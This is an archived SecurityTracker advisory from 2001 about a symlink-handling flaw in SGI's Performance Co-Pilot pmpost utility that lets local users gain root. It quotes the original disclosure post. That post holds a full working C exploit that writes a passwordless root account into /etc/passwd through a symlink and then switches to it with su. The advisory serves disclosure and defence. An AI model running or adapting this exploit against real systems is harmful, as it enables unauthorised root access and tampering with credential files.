SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Performance Co-Pilot (PCP) Vendors:   SGI (Silicon Graphics)
SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
SecurityTracker Alert ID:  1001781
SecurityTracker URL:  http://securitytracker.com/id/1001781
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 19 2001
Impact:   Execution of arbitrary code via local system
Exploit Included:  Yes  

Description:   A vulnerability has been reported in SGI's Performance Co-Pilot (PCP) system management framework that allows local users to get root level privileges.

The vulnerability is reportedly a symlink handling problem in the pmpost utility, designed to manage text messages. The pmpost utility will reportedly follow symlinks. If the linked file is configured with setuid root privileges, this will allow a local user to obtain root level privileges.

A demonstration exploit script is provided in the Source Message.

Impact:   A local user can obtain root level privileges on the host.
Solution:   No solution was available at the time of this entry.
Vendor URL:  oss.sgi.com/projects/pcp/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  tested on SuSE 7.1

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Information on Vulnerable SuSE Versions is Provided) Re: SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
The SuSE vendor indicates which SuSE distributions are affected and not affected.
(SGI Does Not Confirm But Provides Recommendations) Re: SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
SGI provides some configuration recommendations while they investigate the vulnerability report.
(Vendor Releases a Fix) Re: SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
The vendor has released a fix.
(CIAC Issues Advisory L-099) Re: SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
CIAC has issued advisory L-099.
(SGI Issues Fix for IRIX) Re: SGI's Performance Co-Pilot (PCP) Suite Lets Local Users Obtain Root Level Privileges on the Server
SGI has issued a fix for IRIX.



 Source Message Contents

Subject:  pmpost - another nice symlink follower


Hi,

there is a symlink handling problem in the pcp suite from SGI. The
binary pmpost will follow symlinks, if setuid root this leads to instant
root compromise, as found on SuSE 7.1 (I doubt that this a default SuSE
package, though).

Attached a simple C source to demonstrate this (gcc pm.c -o pm  then
./pm)



Ihq.



---------------------- pm.c ----------------------------

/********************************************************
*							*
*		pmpost local root exploit		*
*		vulnerable: pcp <= 2.1.11-5		*
*		by IhaQueR				*
*							*
********************************************************/




#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/stat.h>



main()
{
const char *bin="/usr/share/pcp/bin/pmpost";
static char buf[512];
static char dir[128];


	srand(time(NULL));
	sprintf(dir, "/tmp/dupa.%.8d", rand());

	if(mkdir(dir, S_IRWXU))
		_exit(2);

	if(chdir(dir))
		_exit(3);

	if(symlink("/etc/passwd", "./NOTICES"))
		_exit(4);

	snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir);

	if(putenv(buf))
		_exit(5);

	if(!fork()) {
		execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
		_exit(1);
	}
	else {
		waitpid(0, NULL, WUNTRACED);
		chdir("..");
		sprintf(buf, "rm -rf dupa.*");
		system(buf);
		execl("/bin/su", "/bin/su", "r00t", NULL);
	}
}

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC